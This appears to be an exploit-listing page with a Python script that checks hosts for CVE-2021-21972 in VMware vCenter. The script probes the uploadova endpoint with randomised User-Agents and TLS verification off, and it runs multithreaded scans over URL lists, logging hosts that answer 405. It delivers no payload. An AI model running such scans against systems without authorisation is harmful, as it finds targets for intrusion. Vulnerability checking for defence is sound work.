| Title | Published | Family |
|---|---|---|
| Exploit for Path Traversal in Mikrotik Routeros | 21 Oct 2021 11:42 | gitee |
| Exploit for Path Traversal in Mikrotik Routeros | 27 Jul 2025 04:24 | gitee |
| Exploit for Improper Restriction of XML External Entity Reference in Apache Solr | 7 Mar 2021 11:09 | gitee |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 9 Dec 2021 20:36 | gitee |
| Exploit for Path Traversal in Mikrotik Routeros | 9 Feb 2022 23:12 | gitee |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 30 Mar 2021 17:07 | gitee |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 16 Mar 2021 15:35 | gitee |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 17 Mar 2021 10:58 | gitee |
| Exploit for Improper Restriction of XML External Entity Reference in Apache Solr | 16 Aug 2021 16:49 | gitee |
| Exploit for Path Traversal in Vmware Cloud_Foundation | 22 Apr 2021 14:00 | githubexploit |

```python
# -*- coding: utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

# Requests below use verify=False; silence the resulting TLS warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Force HTTP/1.0 for every request made through http.client.
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

# Endpoint probed by the check.
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"


def get_ua():
    """Build a randomised Chrome User-Agent string."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def CVE_2021_21972(url):
    """Send one GET to TARGET_URI and report on the status code."""
    # requests looks proxies up by URL scheme ("http", "https"); the
    # misspelled "scoks5" key matches nothing, so no proxy is actually used.
    proxies = {"scoks5": "http://127.0.0.1:1081"}
    headers = {
        'User-Agent': get_ua(),
        "Content-Type": "application/x-www-form-urlencoded"
    }
    targetUrl = url + TARGET_URI
    try:
        res = requests.get(targetUrl,
                           headers=headers,
                           timeout=15,
                           verify=False,
                           proxies=proxies)
        # proxies={'socks5': 'http://127.0.0.1:1081'})
        # print(len(res.text))
        # The script treats HTTP 405 as the sign that the host is affected.
        if res.status_code == 405:
            # Message: "CVE-2021-21972 vulnerability present"
            print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
            # print("[+] Command success result: " + res.text + "\n")
            # Append the URL to the results file ("vulnerable addresses").
            with open("存在漏洞地址.txt", 'a') as fw:
                fw.write(url + '\n')
        else:
            # Message: "CVE-2021-21972 vulnerability not found"
            print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")
    except Exception:
        print("[-] " + url + " Request ERROR.\n")


def multithreading(filename, pools=5):
    """Run the check for every URL in `filename` on `pools` worker threads."""
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")]
            # func_params = [i] + [cmd]
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(CVE_2021_21972, works)
    for req in reqs:
        pool.putRequest(req)
    pool.wait()


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
                        "--file",
                        help="Url File; Example:url.txt")
    # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
    args = parser.parse_args()
    url = args.url
    # cmd = args.cmd
    file_path = args.file
    if url is not None and file_path is None:
        CVE_2021_21972(url)
    elif url is None and file_path is not None:
        multithreading(file_path, 10)  # check the listed URLs with 10 worker threads
    else:
        # Neither or both options given: show usage instead of exiting silently.
        parser.print_help()


if __name__ == "__main__":
    main()
```